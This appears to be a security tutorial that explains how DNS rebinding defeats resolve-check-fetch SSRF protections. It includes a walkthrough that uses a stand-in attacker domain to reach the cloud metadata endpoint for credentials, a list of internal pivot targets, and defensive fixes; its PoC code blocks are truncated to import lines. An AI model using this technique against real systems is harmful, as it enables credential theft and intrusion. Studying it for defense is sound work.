SSRF is well-understood at this point. Most applications that make server-side HTTP requests have some form of protection: URL validation, IP blocklists for private ranges, allowlists for known-good hosts. If you're testing a modern application, you'll usually run into at least one of these.
But many of these protections share a flaw that isn't immediately obvious. They validate the DNS resolution at one point in time and trust it at another. DNS rebinding exploits this gap. The application resolves your domain, sees a safe IP, lets the request through, and by the time it actually connects, the domain resolves to something else entirely.
How SSRF Protections Typically Work
If you've looked at how applications defend against SSRF, you've probably seen some variation of this pattern:
- Accept a URL from user input
- Resolve the hostname to an IP
- Check the IP against a blocklist (private ranges, link-local, cloud metadata IPs)
- If the IP is safe, make the HTTP request
Sometimes it's a hostname allowlist instead of an IP blocklist. Sometimes there are network-level controls like firewall rules blocking the metadata endpoint. But the most common approach is the resolve-check-fetch pattern above.
The implicit assumption in this design: the DNS resolution at validation time will match the DNS resolution at fetch time.
The Time-of-Check to Time-of-Use Problem
This is a TOCTOU vulnerability. The application resolves the domain twice — once to validate the IP, once to connect — and assumes both resolutions will return the same address. They don't have to.
How DNS Rebinding Works
The attack requires two things: a domain you control and an authoritative DNS server you control. You configure the DNS server to respond with different IPs depending on when the query arrives, and you set the TTL to 0 so nothing gets cached.
Here's the sequence:
- You submit a URL with your domain to the target application:
https://evil.attacker.com/foo - The application resolves
evil.attacker.com. Your DNS server responds with1.2.3.4(your public IP). TTL is 0. - The application checks
1.2.3.4against its blocklist. It's not a private IP, not a metadata IP. Passes validation. - The application makes the HTTP request to
evil.attacker.com. Because TTL was 0, it resolves the domain again. This time your DNS server responds with169.254.169.254. - The application connects to the cloud metadata endpoint, thinking it's connecting to your validated external host.
The TTL of 0 is what forces the second resolution. Without it, the resolver would cache the first result and the rebind wouldn't happen. In practice you may need to send the request a few times because some resolvers ignore TTL=0 or enforce a minimum, but it works.
Building a PoC
The Vulnerable Application
Here's a minimal Flask app with the standard resolve-check-fetch SSRF protection:
import socket |
The vulnerability is between socket.gethostbyname() and requests.get(). The application resolves the hostname to check the IP, then requests.get() resolves it again to actually connect. If the DNS response changes between those two calls, the blocklist is bypassed.
The DNS Server
You can use existing tools for the rebinding DNS server. rbndr.us by Tavis Ormandy is the simplest — it's a public service where you encode two IPs in the subdomain and it alternates between them. whonow is a configurable rebinding server you can self-host. Singularity of Origin is a full attack framework from NCC Group.
For a self-contained demo, here's a minimal authoritative DNS server in Python that alternates between two IPs:
from dnslib import DNSRecord, RR, A, QTYPE |
The first query for a domain returns the safe IP. The second returns the target. TTL is 0 on both.
Point your attacker-controlled domain's NS records to the machine running this server, submit the URL to the vulnerable app, and the second resolution hits the metadata endpoint.
The Race Condition
In practice, this doesn't always work on the first try. The gap between the validation resolution and the fetch resolution is small, and some resolvers cache aggressively regardless of TTL. A few things that help:
- Send the request multiple times. The rebind only needs to succeed once.
- Some implementations add a small
sleep()between validation and fetch (ironically making them more vulnerable, not less). - Certain resolver configurations (like glibc's default behavior) are more susceptible than others.
What About IMDSv2?
If the target is running on AWS, the obvious rebinding target is the instance metadata service at 169.254.169.254.
IMDSv1 is a simple GET request. Any SSRF that reaches it gets the credentials. DNS rebinding makes this trivial.
IMDSv2 added a token-based flow: you first make a PUT request to get a session token, then pass that token as a header in subsequent GET requests. This means a basic GET-only SSRF — which is what most SSRF vulnerabilities give you — can't reach IMDSv2 metadata even with DNS rebinding.
But it's not a complete fix. If the SSRF allows you to control the HTTP method and headers (which some do, especially when the application uses a full HTTP client library and passes through user-controlled parameters), IMDSv2 is still exploitable. The rebinding gets you to the metadata IP; the question is whether you can also craft the right request once you're there.
Beyond Cloud Metadata
The metadata endpoint gets all the attention, but it's not the only thing listening on internal networks. Once you can rebind to an internal IP, anything that trusts source IP or has no authentication is fair game:
- Internal admin panels and dashboards — plenty of internal tools that assume network access equals authorization
- Databases and caches on localhost — Redis, Elasticsearch, Memcached. Redis in particular accepts commands over HTTP-like protocols
- Internal APIs with no auth — microservices that trust the network boundary. If a service only listens on the internal VPC and doesn't authenticate requests, rebinding to its IP gives you full access
- Kubernetes API server — if the pod can reach the API server and RBAC is misconfigured, that's cluster access
DNS rebinding isn't just an SSRF bypass for cloud metadata. It's a way to pivot into anything the application can reach internally.
Defenses That Actually Work
The resolve-check-fetch pattern is broken by design. Here's what fixes it:
Resolve once, connect to the IP directly. The application should resolve the hostname, validate the IP, and then make the HTTP request to the IP itself (with the original hostname in the Host header if needed). This eliminates the second resolution entirely. In Python with requests, you can do this with a custom transport adapter or by passing the resolved IP directly.
Use a dedicated egress proxy. Route all server-side HTTP requests through a proxy that enforces IP restrictions at the connection layer. The proxy resolves and connects in a single step, with no gap for rebinding. Smokescreen by Stripe is purpose-built for this.
Network-level controls. Block compute instances from reaching the metadata endpoint at the network layer. On AWS, set the IMDSv2 hop limit to 1 (prevents containers from reaching it through the host), use VPC endpoint policies, or use iptables rules to drop traffic to 169.254.169.254 from application processes.
Disable IMDSv1. If you're on AWS and haven't done this already, do it. IMDSv2 doesn't eliminate the SSRF risk entirely but it raises the bar significantly.
Any defense that resolves a hostname, checks the result, and then hands the hostname back to an HTTP library to resolve again is vulnerable to rebinding. The fix has to happen at the layer where the connection is made, not where the URL is parsed.